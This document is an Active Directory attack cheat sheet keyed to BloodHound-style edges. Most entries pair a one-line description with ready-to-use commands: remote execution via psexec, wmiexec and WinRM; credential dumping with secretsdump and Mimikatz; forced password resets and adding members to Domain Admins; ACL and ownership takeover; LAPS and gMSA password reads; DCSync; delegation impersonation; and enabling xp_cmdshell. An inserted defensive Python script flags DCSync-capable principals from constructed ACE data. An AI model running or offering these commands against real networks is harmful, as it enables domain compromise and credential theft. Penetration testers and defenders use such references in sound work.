AdminTo
Full local admin on target computer. Execute code via SMB, WMI, or WinRM.
impacket-psexec 'DOMAIN/USER:Password@TARGET'
impacket-wmiexec 'DOMAIN/USER:Password@TARGET'
evil-winrm -i TARGET -u USER -p 'Password'
CanRDP
Remote Desktop access to target computer.
xfreerdp /u:USER /p:'Password' /d:DOMAIN /v:TARGET
xfreerdp /u:USER /pth:NTHASH /d:DOMAIN /v:TARGET
HasSession
A user has an active session on the computer. With local admin on that host, the session's credentials can be dumped.
impacket-secretsdump 'DOMAIN/USER:Password@TARGET'
Invoke-Mimikatz -ComputerName TARGET
MemberOf
User/group is member of target group. Inherits all rights granted to that group.
GenericAll
Full control over target object. Reset password, add to group, modify attributes.
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET
GenericWrite
Write access to non-protected attributes. Abuse via SPN write or logon script.
Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='fake/spn'}
WriteOwner
Change the owner of the target object. Take ownership, then grant yourself full control.
Set-DomainObjectOwner -Identity TARGET -OwnerIdentity ATTACKER
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All
WriteDACL
Modify the DACL of the target object. Grant yourself any right on it.
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All
ForceChangePassword
Change user password without knowing current password.
rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"
AddMember
Add any principal to target group.
Add-DomainGroupMember -Identity 'TARGET_GROUP' -Members ATTACKER
AllExtendedRights
All extended rights on object: reset password, read LAPS, Kerberoast.
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
ReadLAPSPassword
Read the LAPS local admin password from the ms-Mcs-AdmPwd attribute of the computer object.
Get-DomainComputer TARGET -Properties ms-Mcs-AdmPwd, name
impacket-lapsreader 'DOMAIN/USER:Password@DC01' -computer TARGET
ReadGMSAPassword
Read Group Managed Service Account password.
$gmsa = Get-ADServiceAccount -Identity GMSA_ACCOUNT -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
GetChanges / GetChangesAll
Held together on the domain object, these two replication rights equal DCSync rights: the domain's password hashes can be replicated out.
impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-ntlm
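Defender-side check for this edge pair, added here as an example and not part of the original page: given ACEs from the domain object's DACL, list every principal that can DCSync, either because it holds both replication rights together or because it holds a right (GenericAll, WriteDacl, WriteOwner) that lets it grant them to itself. The ACE list, principal names and baseline are constructed; a real audit would feed it from an nTSecurityDescriptor export or Get-DomainObjectAcl output.

```python
from collections import defaultdict

# Well-known control-access-right GUIDs for directory replication.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All

# Rights on the domain object that allow a principal to grant itself the two above.
IMPLIED_BY = {"GenericAll", "WriteDacl", "WriteOwner"}

# Principals expected to replicate (constructed baseline); anything else is a finding.
BASELINE = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
    "DOMAIN\\Domain Controllers",
    "DOMAIN\\Enterprise Domain Controllers",
}

def dcsync_capable(aces):
    """Map principal -> reason for every principal that can DCSync.
    aces: iterable of (principal, right, object_guid); object_guid is "" unless
    right == "ExtendedRight"."""
    held = defaultdict(set)
    for principal, right, guid in aces:
        if right == "ExtendedRight" and guid.lower() in (GET_CHANGES, GET_CHANGES_ALL):
            held[principal].add(guid.lower())
        elif right in IMPLIED_BY:
            held[principal].add(right)
    result = {}
    for principal, rights in held.items():
        if {GET_CHANGES, GET_CHANGES_ALL} <= rights:      # both, held together
            result[principal] = "holds GetChanges + GetChangesAll"
        elif rights & IMPLIED_BY:                          # can self-grant them
            result[principal] = "can self-grant via " + ", ".join(sorted(rights & IMPLIED_BY))
    return result

def findings(aces, baseline=BASELINE):
    """DCSync-capable principals that are not on the expected baseline."""
    return {p: why for p, why in dcsync_capable(aces).items() if p not in baseline}

# Constructed sample: helpdesk holds only GetChanges, which alone is not DCSync.
SAMPLE_ACES = [
    ("DOMAIN\\Domain Controllers", "ExtendedRight", GET_CHANGES),
    ("DOMAIN\\Domain Controllers", "ExtendedRight", GET_CHANGES_ALL),
    ("BUILTIN\\Administrators", "GenericAll", ""),
    ("DOMAIN\\svc_backup", "ExtendedRight", GET_CHANGES.upper()),
    ("DOMAIN\\svc_backup", "ExtendedRight", GET_CHANGES_ALL),
    ("DOMAIN\\helpdesk", "ExtendedRight", GET_CHANGES),
    ("DOMAIN\\jdoe", "WriteDacl", ""),
]

if __name__ == "__main__":
    for principal, why in findings(SAMPLE_ACES).items():
        print(f"FINDING: {principal}: {why}")
```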
AllowedToDelegate
Constrained delegation. Impersonate any user to the target service.
impacket-getST -spn 'cifs/TARGET.domain.local' -impersonate Administrator 'DOMAIN/SVC:Password'
AllowedToAct
Resource-Based Constrained Delegation (RBCD). Write to msDS-AllowedToActOnBehalfOfOtherIdentity.
impacket-rbcd -f ATTACKER_COMPUTER -t TARGET_COMPUTER -dc-ip DC01 'DOMAIN/USER:Password'
SQLAdmin
User has sysadmin rights on MSSQL instance.
impacket-mssqlclient 'DOMAIN/USER:Password@TARGET' -windows-auth
impacket-mssqlclient 'DOMAIN/USER:Password@TARGET' -windows-auth -port 1433
Enable xp_cmdshell and execute a command.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
HasSIDHistory
Object has a foreign SID in its sIDHistory attribute. Can be abused for privilege escalation across trusts.
Get-DomainUser -LDAPFilter '(sIDHistory=*)' -Properties samaccountname, sIDHistory